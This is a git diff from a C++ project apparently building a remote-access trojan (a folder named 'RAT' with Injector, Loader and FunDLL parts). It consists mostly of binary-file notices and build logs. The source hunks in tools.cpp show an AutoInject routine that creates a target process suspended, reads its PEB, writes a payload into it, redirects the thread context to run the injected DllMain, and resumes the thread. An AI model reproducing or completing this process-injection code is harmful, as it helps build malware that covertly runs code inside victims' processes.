diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
new file mode 100644
index 0000000..d30e36e
Binary files /dev/null and b/Debug/FunDLL.iobj differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
new file mode 100644
index 0000000..1e662ac
Binary files /dev/null and b/Debug/FunDLL.ipdb differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
new file mode 100644
index 0000000..7c917d7
Binary files /dev/null and b/Debug/FunDLL.pdb differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index 5f5e757..49dfc3a 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 5191b40..e219a04 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index 9b42e74..29b5d4d 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,5 +1,10 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
+ fundll.cpp
+ tools.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
-tools.obj : error LNK2001: unresolved external symbol _NtQueryInformationProcess@20
-C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll : fatal error LNK1120: 1 unresolved externals
+ Generating code
+c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
+ All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ Finished generating code
+ Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
diff --git a/Dll/Debug/FunDLL.Build.CppClean.log b/Dll/Debug/FunDLL.Build.CppClean.log
index a1a62d7..0e53a99 100644
--- a/Dll/Debug/FunDLL.Build.CppClean.log
+++ b/Dll/Debug/FunDLL.Build.CppClean.log
@@ -1,4 +1,5 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
+c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index 9059f15..34a3dbc 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog
index 4e617ff..6bbc5cf 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog
index bc1eb33..e7ddf59 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
new file mode 100644
index 0000000..b4bb458
Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog
index 46b134b..694b08a 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.command.1.tlog and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog
index 46b134b..bec3985 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.read.1.tlog and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog
index 46b134b..cfcbc5e 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.write.1.tlog and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/unsuccessfulbuild b/Dll/Debug/FunDLL.tlog/unsuccessfulbuild
deleted file mode 100644
index e69de29..0000000
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index 447dc9b..53ebfb9 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 4b50303..2ca1755 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -92,6 +92,7 @@
Windows
true
+ C:\WinDDK\7600.16385.1\lib\wxp\i386\ntdll.lib;%(AdditionalDependencies)
diff --git a/Dll/tools.cpp b/Dll/tools.cpp
index c6ad22a..1792322 100644
--- a/Dll/tools.cpp
+++ b/Dll/tools.cpp
@@ -27,16 +27,16 @@ DWORD ConvertVirtualAddressToRawAddress(DWORD virtual_address, LPVOID file) {
int Tools::AutoInject(LPSTR target, LPCSTR payload) {
LPSTARTUPINFOA startup_info = new STARTUPINFOA();
- LPPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();
- PROCESS_BASIC_INFORMATION *process_basic_info = new PROCESS_BASIC_INFORMATION();
+ LPPROCESS_INFORMATION process_information = new PROCESS_INFORMATION();
+ PROCESS_BASIC_INFORMATION *process_basic_information = new PROCESS_BASIC_INFORMATION();
- BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);
+ BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_information);
if (process_created == TRUE) {
- HANDLE target_process = process_info->hProcess;
+ HANDLE target_process = process_information->hProcess;
if (target_process != INVALID_HANDLE_VALUE) {
DWORD return_lenght = 0;
- NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_info, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght);
- DWORD image_base_offset = (DWORD)process_basic_info->PebBaseAddress + 8;
+ NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_information, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght);
+ DWORD image_base_offset = (DWORD)process_basic_information->PebBaseAddress + 8;
LPVOID destination_image_base = 0;
SIZE_T bytes_read = NULL;
@@ -122,7 +122,7 @@ int Tools::AutoInject(LPSTR target, LPCSTR payload) {
LPCONTEXT context = new CONTEXT();
context->ContextFlags = CONTEXT_INTEGER;
- GetThreadContext(process_info->hThread, context);
+ GetThreadContext(process_information->hThread, context);
// machine code -> opcodes
// code for exec DllMain when injected
@@ -146,8 +146,8 @@ int Tools::AutoInject(LPSTR target, LPCSTR payload) {
if (success == TRUE) {
context->Eax = (DWORD)address_buffer;
- SetThreadContext(process_info->hThread, context);
- ResumeThread(process_info->hThread);
+ SetThreadContext(process_information->hThread, context);
+ ResumeThread(process_information->hThread);
}
return 0;
}
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index a761978..fd7f644 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index d67335b..7bf1f48 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index 6c5c365..444af5d 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index 4a1d873..f03f114 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index d45b5fc..0898a27 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ